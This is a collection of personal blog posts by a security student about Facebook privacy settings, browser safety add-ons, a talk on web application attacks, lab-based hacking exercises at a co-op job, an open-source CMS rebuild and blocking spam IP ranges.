Fix Your Facebook Privacy Settings

Earlier this week, Facebook rolled out a new privacy policy which allows outside applications to view information stored on you, including your likes, connections, education, current city, and more. Needless to say, there’s a big issue with privacy here. While you want your friends to be able to see this information, you want to avoid giving it to 3rd parties as much as possible. Here’s some key tips to locking down your profile from those automated prying eyes.

1. Remove Instant Personalization [link]

Instant personalization gives your information to 3rd party websites such as Docs.com, Pandora, and Yelp. Uncheck this box to prevent these sites from accessing your information.

2. Remove Unused (and sketchy) Applications [link]

Chances are you’ve added some application at some point, and although you deleted it off your profile, it probably still has access to your profile. Remove any unwanted applications by going to the link above and deleting those apps which shouldn’t be there. You might be surprised how many pages can see your information!

3. Remove Your Public Profile [link]

Data mining will largely rely on your public profile as a starting point for gathering your information. Remove that ability by going to the link above. Change your Facebook Search Results to Friends and Networks, and then Uncheck the option to have a public profile.

4. Lock Down Your Contact Information [link]

On this page, you can find all of the contact methods that are available to you. Unless you really want anybody to contact you, it is best to set almost all of these to “Friends” and nothing else. The only exceptions are the option to add you as a friend, and to send you messages. Both are worthwhile to leave open to everybody unless you happen to get spam from them.

5. Lock Down Your Profile Information [link]

Finally, there’s your actual profile information that should be locked down. Setting all of these to “Only Friends” is the best course of action.

If you haven’t done so, lock down your information soon. I can guarantee that the automated data mining services are working full-tilt in case Facebook reverts its privacy settings. It’s time to take control of your profile settings.

Five Steps To Protect Against Browser Attacks

Some days, it pains me to see how woefully insecure some web browsers are. Every day, it seems that ten new browser-based exploits (or client-side attacks, as my presentation will tell you) are publicly released, and just because you’re on a site that you think is legitimate doesn’t mean that somebody hasn’t compromised it.

For those of you using Internet Explorer (IE), I pity you. IE, still being the #1 most commonly-used browser in the world, is the target of the most attacks by far out of all the major browsers. If you’re smart enough to use another, better browser, then you’re already one step towards protecting yourself. I’m going to assume, though, that you’re using Firefox or one of it’s derivatives such as Flock, since the plug-in libraries are huge.

1. Use the Web of Trust

https://addons.mozilla.org/en-US/firefox/addon/3456
My Web of Trust (MyWOT) is a plugin for Firefox that warns you about potentially risky sites. It can alert you to known scam sites, spam sites, and pages that are known for hosting malware. It’s great for getting an idea of how trustworthy the site you are visiting is, and is a great extra level of protection against attacks against your computer.

2. Block Javascript and Popups

AdBlock Plus: https://addons.mozilla.org/en-US/firefox/addon/1865
NoScript: https://addons.mozilla.org/en-US/firefox/addon/722
The most common form of browser-based attack is cross-site scripting, or XSS. XSS uses Javascript (a scripting language that websites use) in order to force your browser to do something. Typically, Javascript usage is legitimate; when you post something on somebody’s wall on Facebook, Javascript is used there to push the new message to their wall without refreshing the page, and to create that cool sliding effect as the old posts move down the page. You can also use it for malicious use, though. Stealing login credentials is a common one, but I’ve seen Javascript sophisticated enough to hijack your browser, forcing you to visit sites without you having any input or even downloading and running malware and viruses against your will. NoScript will block all Javascript, and then you can tell it what you want to enable. It takes a while to configure properly, but after a week or so of setting it up, you’ll be a lot more secure. XSS sometimes propagates through ads, so AdBlock is nice to have as well.

3. Use Different Passwords

This always seemed like a no-brainer to me, but I know many other people who won’t do this. Using the same password for multiple sites is just stupid. If somebody manages to steal your password from one site, what’s stopping them from going to the other site (and no, having a different user name isn’t going to prevent anything). Instead of using the same password, use different ones, minimum 8 characters, and random characters. If you can’t remember all of those, take two 4-character random strings, and take the domain name, and put each random string on either side of the domain; there’s your password. For example: “4n$sFACEBOOKn4%l”. Swap “e” for “3”, “s” for “$” or “l” for “1” – think L33T!

4. Clear Those Tracking Cookies

https://addons.mozilla.org/en-US/firefox/addon/6623
Although you may not realize it, tracking cookies are used to track your movement around the internet. Although you may visit very different web pages, the company that displays ads on the sites may be the same. Beat these cookies with BetterPrivacy, which removes tracking cookies and LSOs from your browser cache.

5. If You Didn’t Expect To Get It, Don’t Click It

I hate to have to reiterate common sense, but sometimes it escapes us. If you didn’t expect to get a link from somebody, or they sent you a file that you weren’t planning on getting, don’t open it. I don’t care if it came from their MSN account; if you didn’t follow rule #3, there’s no reason why their account couldn’t have been hacked. If someone sends you a link, do yourself a favour and just ASK the person what it is before you click it; if you get a reply that is something that your friend would say, then you’re probably okay.


Well, that took longer than expected. Hopefully that’s of some use for people. As always, I appreciate your comments and feedback. If you like what you read, help me out by posting the article on Reddit, Facebook, or Digg (or sending the link to a friend). See you next Monday!

IPAM Presentation: November 2009

Last Wednesday, myself and the other co-op student working with me did a presentation to the Information Protection Association of Manitoba (IPAM) about attacks on web-based applications. It was certainly an interesting experience. Although it wasn’t a stellar performance, I think we did okay considering our presentation skills. Unfortunately we were expecting a slightly larger percentage of technical-minded people rather than business-minded people, and thus I got the impression that some of the talk was a little over the heads of a few of those in attendance. Regardless, it was a learning experience, and something I learned a lot from.

I was approached twice after our presentation was over. The first gentleman, to paraphrase, suggested that the presentation would be more useful had it included a mitigation strategy to prevent and (hopefully) eliminate the possibility of attack. I thought he might be on to something here. After all, wouldn’t it be great to have a check list to go through, and making sure each item is checked off would result in a secure application? For the rest of the day, I spent a lot of time going back and forth on this idea. On one hand, this check list would be nice, but I also firmly believe that a large amount of the prevention relies on the skill level of the programmer, debugger, and penetration tester, and a check list simply wouldn’t be sufficient to protect yourself from attacks. But, having the check list would be a good start. Sort of an “if you’ve done these things, you’ve covered the basics” check list. It would be a good reminder sheet for pro programmers, and a good stepping stone for those who are just starting off. To that person, your suggestion has been heard, and the check list has been added to my to-do list, hopefully to have a first draft out within a month or so, so stay tuned for that.

The second gentleman asked if the slides to the presentation would be online for later viewing. At the end of the presentation, although we took almost an hour, I was well aware that we were rushing; we probably had too much content that we wanted to cover. Before the presentation I had already planned to put the slides online as a reference; although it’s nice to see the slides during the talk, it’s also nice to go back and view them at a later date. Thus, my slides will be online here for anybody to take a look at. I will also be posting my source code, but that will be a bit later (ie. probably next week), since there’s a few sections that are a little finicky right now.

The First Week

Looking forward to going to work Is a feeling that I’ve never felt before this week. It’s an odd feeling, and one I don’t know if I will ever completely get used to. Of course, I’m sure the feeling will wear off after a while.

In the past week, I have gotten a number of experiences that I would not have gotten any other place. My first two days were spent trying to break into a web application on a VM. Although I managed to get access to a few things, I never really got that far.

Today presented a similar scenario. In a virtual network, there were a number of computers: some desktops and some servers. I had to gain access to some “fianancial information” hidden on a server, using exploits in the other machines to gain access. Although I needed a few hints here and there, I managed to get the sensitive information using a variety of tools, including two kernel exploits, sqlmap, Nmap, Metasploit, and RainbowCrack. It was a really fun experience, and I’m glad I got to take it for a test drive.

The icing on the cake for today, however, was using a decompiler to disassemble a fake program requiring activation and bypassing the registration. From the information gathered we made a keygen using 3 different methods. Doing so requires a bit of smarts and a lot of assembly knowledge, which is something I don’t have a lot of. With some help though, I managed to crack the registration, which was an exhilerating experience.

These experiences are pretty much all thanks to Ron Bowes, one of the guys I’m working with. I’d call him an IT Professional (he’s certainly skilled enough), but he might laugh at me for such a remark. The virtual network was all designed by him, and he walked me through the application hacking, showing me every step and how it was done. I certainly have no intentions of using any of that knowledge to break the registration information for any program for any reason other than my own personal development, but it was still a really amazing experience. He keeps a blog on his homepage (I’m mentioned in a recent post), and it’s certainly an interesting read.

A final thing that I’m working on at work is a suitable replacement for Burb Suite, which is an application for attacking web applications. It’s a really powerful program, but there’s three main problems with it: it’s closed source, you have to pay for it, and the Swing interface is god-awful ugly. Other free utilities lack in either power, the user interface, or both. So, upon approval from a supervisor, I might be helping to develop a free open source alternative which would be released into the public domain. We’ve decided to program the backend in Ruby, and so far it’s going really smoothly. In just one day I almost have the proxy designed, and I’m looking forward to getting the backend completed.

All in all, work is great so far. Getting paid to do something you love is amazing.

Going Open Source

The first time I wrote a full website, I made a lot of mistakes. A LOT.

Although not completely obvious from looking at it on the outside, H2H Security Group is built on a pretty shoddy content management system (CMS). There are bugs, there are incomplete sections of the site, and there is little administration that doesn’t require direct database access. I’ve stopped development on the current CMS and decided to go for a complete overhaul. That’s right: I’m completely re-building the system, H2H CMS, from the ground up.

Normally, this would be a preposterous idea, and perhaps it’s not the most efficient route for me to take, but I won’t be walking away from the CMS empty handed. It was an amazing experience working on it. Despite it being terribly designed, I’ve grown a lot as a programmer since I first started. I’ve learned about things like classes, hierarchies, debugging tools, exceptions, mysqli, more advanced MySQL statements, and caching. I’ve learned about the differences between versions of software such as PHP, which had monumental changes from PHP4 to PHP5. Most importantly, I learned proper software development in a university course. Looking back, every mistake I made during the design of the old CMS I have learned from, and I’m willing to make a mistake if it means that I learn from it.

Another big change I’m making is that I am going Open Source: letting anyone take a look at the source code. I’m sticking with a Creative Commons license, which allows anyone to take the code, modify it, and redistribute it for free, providing they give me credit for the original work. I think it’s the right choice to make, sticking with the hacker mentality and whatnot. With a goal of distributing knowledge and information to the masses, I think the open source route is a logical step to achieving that.

I started off the development of the new CMS quite differently than before; rather than jumping straight into the coding, I started off old-school: with a pen and paper. Design before development helped ensure everything stayed organized this time. Developing class-by-class, piece by piece allowed for logical places to start and stop work.

The part about this CMS that I am most proud of, however, is that security is added and implemented standard – not as an afterthought. Being interested in security, this seemed like a no-brainer, but it seemed to be either non-existant, poorly implemented, or at the expense of efficiency in other systems available. By considering both security and efficiency at the same time, I hope to develop a system that maintains both equally.

I always like to see people become involved in my projects. If someone is interested in helping with the development, let me know, and maybe something can be arranged.

Ohloh Page: http://ohloh.net/p/h2h-cms/

Project Trac Page: http://dj-bri-t.servehttp.com/projects/cms/

Meat In A Tin

Over the past week or so, I’ve found that one of my other websites, H2H Security Group, has been getting a lot of spam. Unfortunately, it’s not just the random ads from bots. Bots I can deal with, and it’s unlikely that they’ll ever get past registration because there’s a reCAPTCHA in the registration. No, I have to deal with credit card spam.

Most people I know get spam in their email; it happens to almost all of us if we have a presence on the web with that email address. If any of you have read the spam before, usually it’s just a random string of words with a few links in them. Heck, some of them are just downright amusing. But credit card spam is more of a problem; not only is a nuisance, but it’s highly illegal. Not something that you want on a legitimate website.

The first problem was determining if the spam was automated (ie. from a bot), or a person who was posting the spam. The easiest way to do this was to install the reCAPTCHA system as I mentioned above. If you’ve signed up for any major service recently, chances are you’ve encountered a CAPTCHA of some sort. CAPTCHAs are the images with random numbers and letters which is supposed to be hard to read by an automated system, but fairly easy for a human. They are specifically designed to prevent bots from accessing the system. Although the reCAPTCHA system I installed stopped some of the spam, it didn’t stop all of it.

Stopping spam requires ruling your web site with an iron fist. Some automated scripts will help minimize it, but on a long enough timeline, spam will get through. It’s bound to happen. Currently the only way I’ve found to stop the spam is to start blocking IP addresses. In the case of this incident, I was forced to block an entire subnet of IP addresses. I found that ISP in Vietnam was producing a lot of the spam that I received. Despite numerous emails to their abuse department I found out that they deleted the emails without reading them, and made the decision to block the entire ISP from my web site.

Doing so is a bit of a double-edged knife. On one hand, the spam has stopped since I’ve done this (although I only did this two days ago – let’s see what happens!). On the other hand, I have pretty much cut off an entire country from visiting my site. Granted, the primary language there is not my primary target for my site, but still has the problem of cutting off legitimate users.

Of course, this is not a foolproof solution. There’s no reason that a person on that ISP couldn’t use a proxy to access my site and post more spam, but I’m taking a proactive approach to preventing this spam, and that’s about all one can do. Perhaps an interesting project would be to keep a central repository of known spamming IP addresses so that those IPs could be blocked by many websites around the world, and not just by a single server. Allowing a group of servers who pick up spam regularly to add IPs to the list for a number of days, and then many servers could download a list. It’s maybe something to consider to stop the spread of spam across the world.